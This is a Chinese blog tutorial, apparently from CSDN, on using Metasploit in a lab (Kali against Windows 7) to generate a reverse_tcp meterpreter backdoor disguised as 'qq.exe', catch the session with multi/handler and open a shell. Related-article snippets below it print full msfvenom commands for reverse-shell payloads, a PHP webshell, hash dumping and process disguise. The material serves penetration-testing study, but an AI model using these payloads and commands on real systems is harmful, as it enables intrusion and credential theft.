利用msf生成后门拿shell

最新推荐文章于 2024-05-20 08:33:57 发布
最新推荐文章于 2024-05-20 08:33:57 发布
阅读量1.1w 收藏 17
点赞数 2
分类专栏: msf shell 文章标签: shell
shell 同时被 2 个专栏收录
1 篇文章 0 订阅
订阅专栏
msf
0 篇文章 0 订阅
订阅专栏
kali  x64:192.168.26.136
win7  x86: 192.168.26.128


先在kali终端输入msfvenom -l,打开payload目录

然后找到payload windows/meterpreter/reverse_tcp

输入以下命令生成后门 qq.exe

然后将生成的qq.exe移到win7然后打开msfconsole

使用该攻击模块监听 use exploit/multi/handler

  然后设置 payload


show options 查看选项

设置 LHOST kali 地址

然后run开始监听


这时我们打开win7qq.exe文件

就能看到 Kali 这边获取到一个 Session


输入jobs退出继续输入sessions -l查看session列表

这里有一个session列表,sessionid1

我们输入 sessions -i 1, 与该 session 交互


输入getuid查看用户信息


输入systinfo获取系统信息


输入shell即可获取win7shell

不过用这样方式拿的shell普遍都是很低的,还需提权


糖瓜不甜
关注
  • 2
    点赞
  • 17
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
kali 使用 msf通过sm17_010漏洞拿到Windows shell
kk的博客
07-30 409
3、找到msf的工具目录,进入smb_ms17_101漏洞利用模块,使用search ms17_010查看可用模块、使用show optionsc查看可支持命令与参数。1、nessus扫描目标系统的IP拿到系统漏洞信息(存在ms11_030、ms17_010、ms16_047漏洞),本教程以ms17_010为例讲解。serach vce:VCE-2017-8464 type:exploit # 查找漏洞VCE-2017-8464的利用方法与模块。modules:存储metasploit的模块文件。
【渗透实战】通过msf模块获取win7主机远程shell
yummy11111的博客
03-25 1133
渗透学习
msf生成后门shell
weixin_30879833的博客
05-24 397
0X01简介 这里我本来想学习 msf利用漏洞反弹shell的 但是 没有靶机....等找了靶机在弄吧 kali 172.18.5.118 靶机 172.18.5.240 先尝试能不能ping通 好的可以 那我们进行下一步 0X01爱之初体验 先在kali终端输入msfvenom -l,打开payload目录 然后找到payload windows/meterpret...
使用MSF进行提权(windows提权、linux提权、wesng使用
最新发布
dzqxwzoe的博客
05-20 751
MSF Windows提权​​​反弹shell​​​提权​​​END推荐阅读​​​MSF Linux提权​​​反弹shell​​​补充wesng用法​​Metasploit 是一个渗透框架,kali 内安装了,安装位置如下选定需要使用的攻击模块之后,你只需要使用简单的命令配置一些参数就能完成针对一个漏洞的测试和利用,将渗透的过程自动化、简单化主要作用:漏洞验证、漏洞利用、内网渗透等。
Kali利用MSF渗透Win 7获取shell
舞指如歌~的博客
09-13 3379
首先在kali上制作一个后门程序,文件名为:setup.exe msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=5050 -f exe -o setup.exe #本地监听地址及端口号:192.168.1.100:5050 为生成的文件 setup.exe 赋予可执行的权限,如果有必要可以对该文件执...
msf基操shell(转)
qq_45290991的博客
07-16 797
实验准备: 攻击(攻击者)主机:          kali 2020.2  虚拟机        nat              ...
msfvenom获取shell
01-03
msfvenom各平台生成木马大全: windows: msfvenom -a x86 –platform Windows -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -e x86/shikata_ga_nai -b ‘x00x0axff’ -i 3 -f exe -opayload....
iis 6.0 CVE-2017-7269 Msf 反弹shell
01-23
iis 6.0 CVE-2017-7269 Msf 反弹shell metasploit漏洞测试利用模块
MSF技术总结
05-07
MSF(Metasploit Framework)是一款功能强大且广泛使用的渗透测试工具,提供了丰富的命令和插件,帮助渗透测试者快速发现和利用系统漏洞。本文将对 MSF 的使用和高级用法进行总结。 一、MSF 架构 MSF 由三个主要...
项目管理利刃之MSF
03-03
火龙果软件工程技术中心 MSF,MicrosoftSolutionFramework,微软解决方案框架是一个在预算范围内按期创建一个业务解决方案需要一种经过检验的方法。本文将结合MSF在项目管理中的实际应用进行讲解,如果您是软件项目...
linux系统安装msf的过程详解
09-14
在Linux系统中安装Metasploit Framework(MSF)是一个重要的步骤,对于网络安全研究者和渗透测试人员来说,这是必备的工具。以下是一个详尽的安装教程,特别针对阿里云Linux系统。 首先,确保你的系统已经更新到...
使用metasploit制做基础的后门程序
梦想闹钟
05-23 245
这里使用metasploit自带的payload生成后门exe文件,LHOST指定连接的地址,LPORT字面意思指定连接的端口,靶机在点击后,就会自己去连接攻击机的端口 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.102.131 LPORT=6060 -f exe > myvirus.exe 之后上传到windows xp的靶机里并点击运行,需要先确保靶机和攻击机能ping通 之后在攻击机再次加载对应的payload并进行监
MSF生成shell连接win2012
李安北的博客
05-07 838
实验环境 kali:192.168.98.168 win2012:192.168.98.167 生成木马 msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.98.168(kali ip) LPORT=777 -f exe > shell.exe #生成的文件上传到目标机器并执行 设置监听 use exploit/multi/handler #创建监听 set payload windows/x64/meterpr
msf获取靶机shell进行远控
xiao_he0123的博客
01-25 4089
思路:msf制作exe木马文件靶机通过点击开启后门 原理:靶机执行木马文件后,向本机(你运行msf的主机)中发送信息,本机打开监听状态,收到信息后进行操作 前提:知道主机IP(命令行输入ifconfig) (1)msf制作木马 输入命令行生成木马exe并保存在var/www/html文件中,这样靶机就可以直接从网页中下载木马 命令行中参数意义: 然后开启apache服务: (2)靶机下载运行木马本机进行监听 靶机在浏览器中输入192.168.40...
MSF建立webshell后门,并监听端口建立session连接
热门推荐
土拨鼠挖洞中的博客
06-23 1万+
一   建立反弹后门msfvenom -p php/meterpreter/reverse_tcpLHOST=192.168.2.146 LPORT=5555 R > test3.php 注:生成的反弹木马存放在当前用户home目录下;将生成的木马上传到目标机中,可以远程访问;windows下asp反弹木马:root@kali:~# msfvenom -p windows/meterpret...
利用metasploit生成反弹shell程序,实现远程控制
qq_33163046的博客
08-20 3893
Metasploit生成反弹shell实现远程控制的方法具有高度定制化、多平台支持、强大的漏洞利用能力、无需事先安装恶意软件以及高度灵活和可扩展等优点。这使得用户能够根据具体需求和目标系统的特点,实现精确、有效和隐蔽的远程控制。
【工具使用】——MSF使用_使用MSF抓取用户密码
weixin_45588247的博客
08-08 6640
一、抓取自动登录的密码:   很多用户习惯将计算机设置自动登录,可以使用run windows/gather/credentials/windows_autologin抓取自动登录的用户名和密码。   点击进入:开启windows用户自动登陆的方法! 命令: run windows/gather/credentials/windows_autologin 二、导出密码哈希: 1. run hashdump命令:   hashdump模块可以从SAM数据库中导出本地用户账号,该命令的使用需要系统权限
msf生成webshell_Metasploit 之使用socket通信的webshell简单分析
weixin_39693193的博客
12-22 326
Metasploit 之使用socket通信的webshell简单分析upload (Van Helsing) | 2013-01-08 21:530x01 前言常规的webshell都是调用该语言中常用函数来完成读取、执行等操作,从协议上来讲是采用http/https协议。但是和服务器通信还有另外一种方式:socket通信。常见的脚本语言asp,php,jsp,都可以实现对应的socket编程...
msf命令
qq_52469895的博客
05-19 2144
常用命令总结 execute执行文件 execute #在目标机中执行文件 execute -H -i -f cmd.exe # 创建新进程cmd.exe,-H不可见,-i交互 execute -H -m -d notepad.exe -f payload.exe -a "-o hack.txt" -d 在目标主机执行时显示的进程名称(用以伪装)-m 直接从内存中执行 "-o hack.txt"是payload.exe的运行参数 migrate进程迁移 getpid # 获取当前进程的p...
msf生成php反弹shell
09-21
msfvenom是Metasploit Framework的一部分,它是一个功能强大的工具,可以用来生成各种类型的恶意软件。要生成PHP反弹shell,你可以使用以下命令: msfvenom -p php/meterpreter/reverse_tcp LHOST=<你的IP地址> ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值